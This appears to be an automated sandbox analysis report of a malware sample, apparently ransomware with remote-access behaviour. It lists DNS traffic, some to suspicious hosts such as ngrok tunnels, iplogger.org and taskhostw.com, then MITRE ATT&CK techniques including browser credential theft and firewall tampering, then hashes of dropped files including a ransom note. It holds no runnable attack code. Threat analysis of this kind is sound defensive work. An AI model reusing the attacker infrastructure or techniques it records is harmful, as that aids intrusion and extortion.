DNS Request

cta-service-cms2.hubspot.com

DNS Response

104.16.117.116

104.16.118.116

DNS Request

cta-service-cms2.hubspot.com

DNS Response

104.16.118.116

104.16.117.116
8.8.8.8:53

116.117.16.104.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

116.117.16.104.in-addr.arpa
8.8.8.8:53

142.78.16.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

142.78.16.104.in-addr.arpa
8.8.8.8:53

168.160.16.104.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

168.160.16.104.in-addr.arpa
8.8.8.8:53

42.87.18.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

42.87.18.104.in-addr.arpa
8.8.8.8:53

240.40.18.104.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

240.40.18.104.in-addr.arpa

DNS Request

240.40.18.104.in-addr.arpa
8.8.8.8:53

www.google.com

dns

msedge.exe

120 B
152 B
2
2

DNS Request

www.google.com

DNS Request

www.google.com

DNS Response

216.58.201.100

DNS Response

216.58.201.100
8.8.8.8:53

100.201.58.216.in-addr.arpa

dns

73 B
171 B
1
1

DNS Request

100.201.58.216.in-addr.arpa
8.8.8.8:53

227.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

227.179.250.142.in-addr.arpa
8.8.8.8:53

perf-na1.hsforms.com

dns

msedge.exe

132 B
196 B
2
2

DNS Request

perf-na1.hsforms.com

DNS Request

perf-na1.hsforms.com

DNS Response

104.18.80.204

104.19.175.188

DNS Response

104.19.175.188

104.18.80.204
8.8.8.8:53

app.hubspot.com

dns

msedge.exe

122 B
186 B
2
2

DNS Request

app.hubspot.com

DNS Request

app.hubspot.com

DNS Response

104.16.117.116

104.16.118.116

DNS Response

104.16.118.116

104.16.117.116
8.8.8.8:53

static.hsappstatic.net

dns

msedge.exe

136 B
296 B
2
2

DNS Request

static.hsappstatic.net

DNS Request

static.hsappstatic.net

DNS Response

104.17.173.91

104.17.175.91

104.17.172.91

104.17.174.91

104.17.176.91

DNS Response

104.17.174.91

104.17.176.91

104.17.175.91

104.17.173.91

104.17.172.91
8.8.8.8:53

204.80.18.104.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

204.80.18.104.in-addr.arpa

DNS Request

204.80.18.104.in-addr.arpa
8.8.8.8:53

91.173.17.104.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

91.173.17.104.in-addr.arpa

DNS Request

91.173.17.104.in-addr.arpa
8.8.8.8:53

exceptions.hubspot.com

dns

msedge.exe

136 B
200 B
2
2

DNS Request

exceptions.hubspot.com

DNS Request

exceptions.hubspot.com

DNS Response

104.16.117.116

104.16.118.116

DNS Response

104.16.118.116

104.16.117.116
8.8.8.8:53

metrics-fe-na1.hubspot.com

dns

msedge.exe

144 B
208 B
2
2

DNS Request

metrics-fe-na1.hubspot.com

DNS Request

metrics-fe-na1.hubspot.com

DNS Response

104.16.117.116

104.16.118.116

DNS Response

104.16.117.116

104.16.118.116
8.8.8.8:53

download.anydesk.com

dns

msedge.exe

66 B
82 B
1
1

DNS Request

download.anydesk.com

DNS Response

159.69.19.197
8.8.8.8:53

10.179.89.13.in-addr.arpa

dns

142 B
290 B
2
2

DNS Request

10.179.89.13.in-addr.arpa

DNS Request

10.179.89.13.in-addr.arpa
8.8.8.8:53

197.19.69.159.in-addr.arpa

dns

144 B
258 B
2
2

DNS Request

197.19.69.159.in-addr.arpa

DNS Request

197.19.69.159.in-addr.arpa
8.8.8.8:53

js-agent.newrelic.com

dns

msedge.exe

134 B
166 B
2
2

DNS Request

js-agent.newrelic.com

DNS Request

js-agent.newrelic.com

DNS Response

162.247.243.39

DNS Response

162.247.243.39
8.8.8.8:53

39.243.247.162.in-addr.arpa

dns

73 B
138 B
1
1

DNS Request

39.243.247.162.in-addr.arpa
8.8.8.8:53

bam-cell.nr-data.net

dns

msedge.exe

132 B
292 B
2
2

DNS Request

bam-cell.nr-data.net

DNS Request

bam-cell.nr-data.net

DNS Response

162.247.243.30

DNS Response

162.247.243.30
8.8.8.8:53

30.243.247.162.in-addr.arpa

dns

146 B
276 B
2
2

DNS Request

30.243.247.162.in-addr.arpa

DNS Request

30.243.247.162.in-addr.arpa
8.8.8.8:53

track.hubspot.com

dns

msedge.exe

126 B
190 B
2
2

DNS Request

track.hubspot.com

DNS Request

track.hubspot.com

DNS Response

104.16.118.116

104.16.117.116

DNS Response

104.16.117.116

104.16.118.116
8.8.8.8:53

79.248.66.18.in-addr.arpa

dns

142 B
254 B
2
2

DNS Request

79.248.66.18.in-addr.arpa

DNS Request

79.248.66.18.in-addr.arpa
8.8.8.8:53

a.nel.cloudflare.com

dns

msedge.exe

132 B
164 B
2
2

DNS Request

a.nel.cloudflare.com

DNS Response

35.190.80.1

DNS Request

a.nel.cloudflare.com

DNS Response

35.190.80.1
8.8.8.8:53

1.80.190.35.in-addr.arpa

dns

70 B
120 B
1
1

DNS Request

1.80.190.35.in-addr.arpa
8.8.8.8:53

7940397.fs1.hubspotusercontent-na1.net

dns

msedge.exe

168 B
232 B
2
2

DNS Request

7940397.fs1.hubspotusercontent-na1.net

DNS Request

7940397.fs1.hubspotusercontent-na1.net

DNS Response

172.64.146.132

104.18.41.124

DNS Response

172.64.146.132

104.18.41.124
8.8.8.8:53

132.146.64.172.in-addr.arpa

dns

146 B
270 B
2
2

DNS Request

132.146.64.172.in-addr.arpa

DNS Request

132.146.64.172.in-addr.arpa
8.8.8.8:53

boot.net.anydesk.com

dns

AnyDesk.exe

132 B
164 B
2
2

DNS Request

boot.net.anydesk.com

DNS Request

boot.net.anydesk.com

DNS Response

57.129.37.28

DNS Response

57.129.37.157
8.8.8.8:53

relay-c9990d24.net.anydesk.com

dns

AnyDesk.exe

76 B
92 B
1
1

DNS Request

relay-c9990d24.net.anydesk.com

DNS Response

208.115.231.190
8.8.8.8:53

28.37.129.57.in-addr.arpa

dns

71 B
110 B
1
1

DNS Request

28.37.129.57.in-addr.arpa
8.8.8.8:53

190.231.115.208.in-addr.arpa

dns

148 B
236 B
2
2

DNS Request

190.231.115.208.in-addr.arpa

DNS Request

190.231.115.208.in-addr.arpa
8.8.8.8:53

api.playanext.com

dns

AnyDesk.exe

126 B
340 B
2
2

DNS Request

api.playanext.com

DNS Request

api.playanext.com

DNS Response

18.173.233.63

18.173.233.17

18.173.233.47

18.173.233.31

DNS Response

18.173.233.31

18.173.233.63

18.173.233.17

18.173.233.47
8.8.8.8:53

31.233.173.18.in-addr.arpa

dns

144 B
258 B
2
2

DNS Request

31.233.173.18.in-addr.arpa

DNS Request

31.233.173.18.in-addr.arpa
8.8.8.8:53

143.209.114.79.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

143.209.114.79.in-addr.arpa
8.8.8.8:53

15.100.168.192.in-addr.arpa

dns

73 B
73 B
1
1

DNS Request

15.100.168.192.in-addr.arpa
35.190.80.1:443

a.nel.cloudflare.com

https

msedge.exe

6.9kB
5
8.8.8.8:53

67.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

67.31.126.40.in-addr.arpa
8.8.8.8:53

freedesktopsoft.com

dns

msedge.exe

130 B
162 B
2
2

DNS Request

freedesktopsoft.com

DNS Request

freedesktopsoft.com

DNS Response

78.46.117.95

DNS Response

78.46.117.95
8.8.8.8:53

95.117.46.78.in-addr.arpa

dns

213 B
106 B
3
1

DNS Request

95.117.46.78.in-addr.arpa

DNS Request

95.117.46.78.in-addr.arpa

DNS Request

95.117.46.78.in-addr.arpa
8.8.8.8:53

connect.facebook.net

dns

msedge.exe

132 B
114 B
2
1

DNS Request

connect.facebook.net

DNS Request

connect.facebook.net

DNS Response

163.70.151.21
8.8.8.8:53

2.180.250.142.in-addr.arpa

dns

144 B
220 B
2
2

DNS Request

2.180.250.142.in-addr.arpa

DNS Request

2.180.250.142.in-addr.arpa
8.8.8.8:53

21.151.70.163.in-addr.arpa

dns

144 B
116 B
2
1

DNS Request

21.151.70.163.in-addr.arpa

DNS Request

21.151.70.163.in-addr.arpa
8.8.8.8:53

googleads.g.doubleclick.net

dns

msedge.exe

146 B
178 B
2
2

DNS Request

googleads.g.doubleclick.net

DNS Request

googleads.g.doubleclick.net

DNS Response

142.250.187.194

DNS Response

142.250.187.194
8.8.8.8:53

fundingchoicesmessages.google.com

dns

msedge.exe

395 B
116 B
5
1

DNS Request

fundingchoicesmessages.google.com

DNS Request

fundingchoicesmessages.google.com

DNS Request

fundingchoicesmessages.google.com

DNS Request

fundingchoicesmessages.google.com

DNS Request

fundingchoicesmessages.google.com

DNS Response

142.250.187.238
8.8.8.8:53

194.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

194.187.250.142.in-addr.arpa
8.8.8.8:53

bot.whatismyipaddress.com

dns

AnyDesk.exe

142 B
260 B
2
2

DNS Request

bot.whatismyipaddress.com

DNS Request

bot.whatismyipaddress.com
8.8.8.8:53

238.187.250.142.in-addr.arpa

dns

148 B
113 B
2
1

DNS Request

238.187.250.142.in-addr.arpa

DNS Request

238.187.250.142.in-addr.arpa
8.8.8.8:53

168.168.165.95.in-addr.arpa

dns

146 B
242 B
2
2

DNS Request

168.168.165.95.in-addr.arpa

DNS Request

168.168.165.95.in-addr.arpa
8.8.8.8:53

81.211.222.158.in-addr.arpa

dns

146 B
246 B
2
2

DNS Request

81.211.222.158.in-addr.arpa

DNS Request

81.211.222.158.in-addr.arpa
8.8.8.8:53

www.veryicon.com

dns

IEXPLORE.EXE

124 B
188 B
2
2

DNS Request

www.veryicon.com

DNS Request

www.veryicon.com

DNS Response

104.21.11.28

172.67.165.22

DNS Response

104.21.11.28

172.67.165.22
8.8.8.8:53

c.pki.goog

dns

IEXPLORE.EXE

112 B
214 B
2
2

DNS Request

c.pki.goog

DNS Response

142.250.200.35

DNS Request

c.pki.goog

DNS Response

172.217.169.3
8.8.8.8:53

i.imgur.com

dns

IEXPLORE.EXE

114 B
256 B
2
2

DNS Request

i.imgur.com

DNS Response

199.232.192.193

199.232.196.193

DNS Request

i.imgur.com

DNS Response

199.232.196.193

199.232.192.193
8.8.8.8:53

202.187.250.142.in-addr.arpa

dns

148 B
113 B
2
1

DNS Request

202.187.250.142.in-addr.arpa

DNS Request

202.187.250.142.in-addr.arpa
8.8.8.8:53

28.11.21.104.in-addr.arpa

dns

142 B
266 B
2
2

DNS Request

28.11.21.104.in-addr.arpa

DNS Request

28.11.21.104.in-addr.arpa
8.8.8.8:53

193.192.232.199.in-addr.arpa

dns

148 B
256 B
2
2

DNS Request

193.192.232.199.in-addr.arpa

DNS Request

193.192.232.199.in-addr.arpa
8.8.8.8:53

233.38.18.104.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

233.38.18.104.in-addr.arpa

DNS Request

233.38.18.104.in-addr.arpa
8.8.8.8:53

www.symantec.com

dns

WIN2CC7.pif

124 B
340 B
2
2

DNS Request

www.symantec.com

DNS Response

104.18.37.111

172.64.150.145

DNS Request

www.symantec.com

DNS Response

104.18.37.111

172.64.150.145
8.8.8.8:53

www.broadcom.com

dns

WIN2CC7.pif

124 B
322 B
2
2

DNS Request

www.broadcom.com

DNS Request

www.broadcom.com

DNS Response

172.64.150.145

104.18.37.111

DNS Response

172.64.150.145

104.18.37.111
8.8.8.8:53

openssl.org

dns

WIN2CC7.pif

58 B
175 B
1
1

DNS Request

openssl.org
8.8.8.8:53

alt2.aspmx.l.google.com

dns

WIN2CC7.pif

138 B
170 B
2
2

DNS Request

alt2.aspmx.l.google.com

DNS Request

alt2.aspmx.l.google.com

DNS Response

142.250.150.27

DNS Response

142.250.150.27
8.8.8.8:53

boglogov.site

dns

118 B
248 B
2
2

DNS Request

boglogov.site

DNS Request

boglogov.site
8.8.8.8:53

boglogov.site

dns

118 B
248 B
2
2

DNS Request

boglogov.site

DNS Request

boglogov.site
8.8.8.8:53

0.tcp.ngrok.io

dns

120 B
152 B
2
2

DNS Request

0.tcp.ngrok.io

DNS Request

0.tcp.ngrok.io

DNS Response

18.190.63.84

DNS Response

18.190.63.84
8.8.8.8:53

taskhostw.com

dns

118 B
150 B
2
2

DNS Request

taskhostw.com

DNS Request

taskhostw.com

DNS Response

152.89.218.85

DNS Response

152.89.218.85
8.8.8.8:53

rms-server.tektonit.ru

dns

136 B
228 B
2
2

DNS Request

rms-server.tektonit.ru

DNS Response

95.213.205.83

DNS Request

rms-server.tektonit.ru

DNS Response

95.213.205.83
8.8.8.8:53

google.com

dns

57 B
77 B
1
1

DNS Request

google.com
8.8.8.8:53

smtp.google.com

dns

122 B
250 B
2
2

DNS Request

smtp.google.com

DNS Request

smtp.google.com

DNS Response

142.250.27.26

142.250.102.26

142.250.102.27

142.250.27.27

DNS Response

142.250.27.27

142.250.102.27

142.250.27.26

142.250.102.26
8.8.8.8:53

iplogger.org

dns

116 B
212 B
2
2

DNS Request

iplogger.org

DNS Request

iplogger.org

DNS Response

172.67.74.161

104.26.3.46

104.26.2.46

DNS Response

172.67.74.161

104.26.3.46

104.26.2.46
8.8.8.8:53

blesblochem.com

dns

61 B
77 B
1
1

DNS Request

blesblochem.com

DNS Response

18.208.156.248
8.8.8.8:53

0.tcp.ngrok.io

dns

120 B
152 B
2
2

DNS Request

0.tcp.ngrok.io

DNS Request

0.tcp.ngrok.io

DNS Response

3.12.245.36

DNS Response

3.135.250.11
8.8.8.8:53

izenpe.com

dns

57 B
186 B
1
1

DNS Request

izenpe.com
8.8.8.8:53

aspmx.l.google.com

dns

128 B
160 B
2
2

DNS Request

aspmx.l.google.com

DNS Response

142.250.102.27

DNS Request

aspmx.l.google.com

DNS Response

142.250.27.26
8.8.8.8:53

middlechrist.com

dns

124 B
156 B
2
2

DNS Request

middlechrist.com

DNS Response

66.96.162.135

DNS Request

middlechrist.com

DNS Response

66.96.162.135
8.8.8.8:53

bemachin.com

dns

58 B
131 B
1
1

DNS Request

bemachin.com
8.8.8.8:53

0.tcp.ngrok.io

dns

60 B
76 B
1
1

DNS Request

0.tcp.ngrok.io

DNS Response

3.12.245.36

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

System Binary Proxy Execution

T1218

Verclsid

T1218.012

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe

Filesize
3.0MB

MD5
81aab57e0ef37ddff02d0106ced6b91e

SHA1
6e3895b350ef1545902bd23e7162dfce4c64e029

SHA256
a70f9e100dddb177f68ee7339b327a20cd9289fae09dcdce3dbcbc3e86756287

SHA512
a651d0a526d31036a302f7ef1ee2273bb7c29b5206c9b17339baa149dd13958ca63db827d09b4e12202e44d79aac2e864522aca1228118ba3dcd259fe1fcf717

Download Submit
C:\Program Files\Java\jdk-1.8\jre\lib\YOUR_FILES_ARE_ENCRYPTED.HTML

Filesize
4KB

MD5
ca3a329397649079abcd03f2e31b6617

SHA1
86cb29c8fe2243c66c02918d3b6bc365f24d61e9

SHA256
8cbcbbeae52af741c81d0e58c6edcfb316581c59cc61f0e6b8cfb20cde9dca8d

SHA512
44de3d17504e21c8f7a42902f0e9687924b7ea046bbc448d4ebd7ce74eddead65696b971fa8f7a970ae3ad5e299b08206465ff889c7115a2a1535c000b9667eb

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\2a4be364-bdb4-4f26-872b-dfe5b0a9b20f.tmp

Filesize
11KB

MD5
34dce82410886b62a49fd4173e6167d7

SHA1
ffbfa5efea25383c4ac623a2801e42b0e97a2be3

SHA256
abae301a70cf083799f66cb6f697e4fc656eb6ac6c3cb9f15e12ce04cfc6ce28

SHA512
3865c8a097d9915b959b579912f570e1a58ca23eadc2ce5c107f1b8ee4288cbeb1465d654611650a060b036a7296b2e26a57868cea9485450750ff16fe583299

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ff63763eedb406987ced076e36ec9acf

SHA1
16365aa97cd1a115412f8ae436d5d4e9be5f7b5d

SHA256
8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c

SHA512
ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2783c40400a8912a79cfd383da731086

SHA1
001a131fe399c30973089e18358818090ca81789

SHA256
331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

SHA512
b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000040

Filesize
330KB

MD5
5eed98d6e37b21fe64e3a5fbad1622d6

SHA1
34782ca3694b17be2aae569d0e3401b8a09194be

SHA256
1494c27d62de2a9570e7ccbdaec4fbb40325f4beca10fba537f92464089322ff

SHA512
fdd76c3fb34388b19db51743bdb613aef89367991c2d5209a8e51f9a6f704a99c52a35bfbbbd43d7b82aa9057128a68d1c1ba860b884b0aa9d9acb1a75950353

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004f

Filesize
27KB

MD5
f36918af4fb6265b1f9b0136be734740

SHA1
24a0df3075b0168d3de7cddb1c26296534386071

SHA256
83580adcbecd3f7a5775b673116cf566e3689515518dcb3692dbc2a677e87868

SHA512
1fc65227f44dd253af534aef6162eaab95c82385fd2ea5fa0bbbe3942cb16b116a27021d18eae5e521add1c8b220dbe607c034db2e89012e286b30a2c496ddf9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000061

Filesize
41KB

MD5
f15af15403a26f56d8ccc04f61dfa3ce

SHA1
44faa7f99c032306b1c6dae18004d8f40dcbf049

SHA256
d59f666bf1957b526d55f14a7d2a9af4f97c4013647b50433842b39a1939f169

SHA512
3008426762507c899b83c1a565ebfc46e44489c4694f56bfdde22be077fe3e9ddcf27102d124f6c4552d9d0743903de6adb3aed7ac0a0a26148ca8c5ecf0541f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000062

Filesize
127KB

MD5
0845665df5fabf13ef2e0bb31d73a225

SHA1
dff5be4e9f7e1a1e41ce6884cd590fa571a823be

SHA256
6a05cc5e5bc4c847b19620f61c362527fd7b76f7ba2173d78106c567246648ad

SHA512
c17897aff47f380a1cd37d32e8306fe9c78863190c8a6d198e103177ea1f13542b00c0e7e9bbb1fbc68f538fc7840237aacc637a3f946843ac52248a286682ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000067

Filesize
144KB

MD5
1369e29c42f3a5aaa911ee70db581f63

SHA1
e70787f6560526bc803f5cfd101e9e1b20e0aeac

SHA256
7c8666debe140ba9cd1e65c78bb4b6e3c8fab0147e53a6d613c3510d97e2ffdd

SHA512
d82b6c032caba4d41c8a579346ffbe2f717dd46e8fcead9c81570c5fc277db209d416c3f8817d055ff675254c9d2fe65c2c348a39fae264ee5b244f0ffdd50af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000068

Filesize
76KB

MD5
793b00639d28cc98f2104dc9cdbae92e

SHA1
1b7910f7edc8c912d187a2fb0ff3288b3d4ec35e

SHA256
452667c50ec286cc16ae9a0a9b0da5d958c29d87044326d0459a38f27e34de4d

SHA512
6f4b8e105838a7bd57c917164c5c8fb2708e15a8670d750d8858cf448ef8f8319a79d66275bac640ff67badfb9cb4651a450934d456e0b82c933b498ccd97748

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006a

Filesize
19KB

MD5
f3a0b554ad79c6db64fa789bff589460

SHA1
8cb8909e599928a95842d783d1b06250bb5d435d

SHA256
5eb58d79bee441d5b11e27fa54cd351d5b190fcf37d1cfb0019fb7faf7e557be

SHA512
f4e81de02152044a9b5aa6050f1af0a7da217536fa35ab2cb012a71678d31a716161f4aeeae17469fe2ddeada421d5b2245de832843b5915fbec624b900e1526

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006e

Filesize
110KB

MD5
06a397e6e5b383a19aa8909556aaa22e

SHA1
c152f1b4f229584639cc4b4bf4f49aa9d7f50090

SHA256
1d235ad338f3827bca416e4b9953904de05636bb8fdb2ac254f890b73e9776dd

SHA512
a8c6eaf3485703fc2d7f43a5030a74eccbf2cdf4ce50f6fc61e37795dfd4fe2156693b5e7fbf82f04072f2747a87601e40b3ff419fd4cc4a746fb01dd6aeb873

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006f

Filesize
24KB

MD5
914380e2b30655be697a1dc6be4d1a99

SHA1
6d6c8d1a8a90ab1ec395c1419822d0c6bef35f78

SHA256
b7497a04e020f1b4e399dae04171f750605c439108214aa77a6e459d00ca530e

SHA512
ec0085b1f37b9209dfc9fc8e0360b8865f73378e0e48d53ecf1e3708851b24c2b3d3d5af51faf7c9a4b86cb2a9511e7a75113c86589bd3ca3abfae01a813680b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000070

Filesize
23KB

MD5
95ba5446f9850f94c13157f942f88718

SHA1
cf7c2458cf90385da779d6e9ed53788aad7082c3

SHA256
4fff58449e656466a8b80443ba23f7adc65c62f18326deb80938e82d0f35c79c

SHA512
0a90244944235c0788df5008928e4c3f0499b67b267f38eac8a3bcc54ba256c6251aac76b6494ee3e2144893e1953e4b29123388e13e6ef833a97a85aa23e2c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000071

Filesize
22KB

MD5
6246bb5a40910bab09156a85cc722366

SHA1
7795f26939ac1eb54936f0357a1f1dd1c67047c3

SHA256
cd32b06230797399f9a78ccfe39d3dd006155c8667b9aa72131ff470eb7f7c02

SHA512
f3a733303d856b3141fb413354d72c5278dec252a3226404209b80c100b4daa69fdf8948f237081ad98ceb999cda6f2c0567e3fd3b5fc90f698bfa4388d3649e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000077

Filesize
41KB

MD5
0af350c480ab565287007d89ab48a899

SHA1
4bc2a2c1ed2f10d047429af7c9bcaab3a34f25bd

SHA256
030239207754b0195bad3b58d42e4bfed6df4aeaff730c3fbaeed92021ca4b85

SHA512
3586ded7ed16c12ba8201b1a215f818e0dcff598e012001a4765cd727587e5243c87c8e7afe84af623d34beeced1b536e1e1671cb3baf72175512a6800efdd6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000079

Filesize
213KB

MD5
f942900ff0a10f251d338c612c456948

SHA1
4a283d3c8f3dc491e43c430d97c3489ee7a3d320

SHA256
38b76a54655aff71271a9ad376ac17f20187abd581bf5aced69ccde0fe6e2fd6

SHA512
9b393ce73598ed1997d28ceeddb23491a4d986c337984878ebb0ae06019e30ea77448d375d3d6563c774856d6bc98ee3ca0e0ba88ea5769a451a5e814f6ddb41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00007e

Filesize
38KB

MD5
267924a638fdbdc2bc2fff01e458b424

SHA1
c15e5394405023f480eabe20df737d484805c7d9

SHA256
2d66b3a3a7a8b3027d5942752785fb80fd087f963cbcd3f5ebbcd392d2fdb23c

SHA512
56b0519f37fda705f5df37031cdbf536c74a29553e7385206dcd10f1a9372d32b341f2cffc07136f45cd474fc2433b5b796c6cb536dbae8eacda22c4888e33fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000089

Filesize
93KB

MD5
1a999b73586b9d30b18912014968047a

SHA1
ca9c594c531ee6580b9f0eb1f5f390e12d7891df

SHA256
3b19bad62ccdadf7d0fde0f87271b1eaa169f35923330e73931197170728e160

SHA512
6c06df09f611a708c53c50f3f5e859975f116a1779e5b4e0cf9d1f7ff9beae6f6d58aa4a4e23e150f7815f3d99e32ceeed4f88afdb9981629b2402e14cfb8b9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00008a

Filesize
231KB

MD5
b0213b70b1ad7b652f77201d3bbc381a

SHA1
9ff048c98d688f49298e1af63db4cda1cf55f6bb

SHA256
1090c009646169cd1c1c08e61b8dd430608f31190bb8b9d2b9caea2aaed3c82e

SHA512
5b50d32c58ed132b5b50fb9ed86a2c6ef5618a812fc69732b73ddfedf5e95870c18bd265fe28b9bd607765e99810e374bf67ec51a719d59583772d7744624dec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000096

Filesize
16KB

MD5
5a67410442e0544c1b21e9d6fdfa4a5c

SHA1
e0ca540a50e57acaf3a82d5de2bf159c5fa16a95

SHA256
5f373c109075c843fb387538770719dd27d68ab98ba47b3d38e75a25e507a2e8

SHA512
48d5581ff59cb874444206fe6381656a214e92ab8409130e308109704035d6f2ec69af74f345d6e584b17f88993047a835d08b1a01a937f54e9cb2a8740e86e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000099

Filesize
16KB

MD5
d7fbfd6cab3dd8c2c6d1d83e39e2d88c

SHA1
c4c16b74f06c541000449a91d51ea7305848d178

SHA256
6c310ead974bc9ffbd469ab142a0e8a8822a7eed5d6e20b9f67c89014344fcec

SHA512
62d9213001ce7fc24fc574e645142220cabf9313f9a8b1187ffbd97c763c99fad23e68d0cabce1f1213d9cf3dbfd410777075021a7d93dee77115ac9da2720ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000a4

Filesize
18KB

MD5
f026af59c351230201521cf2b244f62c

SHA1
9fa99b10e2ad527712dba89509090c3c966279e1

SHA256
b15622716e5c39bf57c50a6945227d07d19eaca23818a94ea6f2b4868955e042

SHA512
6c87f62956afad5e34fb73f74e0ba22736f6f700a0f36acc1d682bc84635b33b5e366838a9a434fafab15f33732b34a677098d527d98ef34e11c37e7a7027e1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\12735e66a898c548_0

Filesize
2KB

MD5
e3205b676cc7828dc813d31af413cebb

SHA1
d3c1903831e7e505cacfa19bfa8d1d34e6877422

SHA256
b63de32e1ee547569dd8d305717fae891e26dbd69d04cdc9d83aada57b224389

SHA512
746b175629dec1e55ef3d3c320dab68259b1f7fe5677454cc3d978e5fa8686272ffbd7fbbae4a8a1d9845a86d6e4143ac9e9f2ab3de59f89d0c06f1ac34a438c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\246a5e2a30e0faa1_0

Filesize
241B

MD5
80490a7f1b11ca11b911ce4231c362df

SHA1
ea968da2dc1b2a14ed17af2bfd3b65156c69738e

SHA256
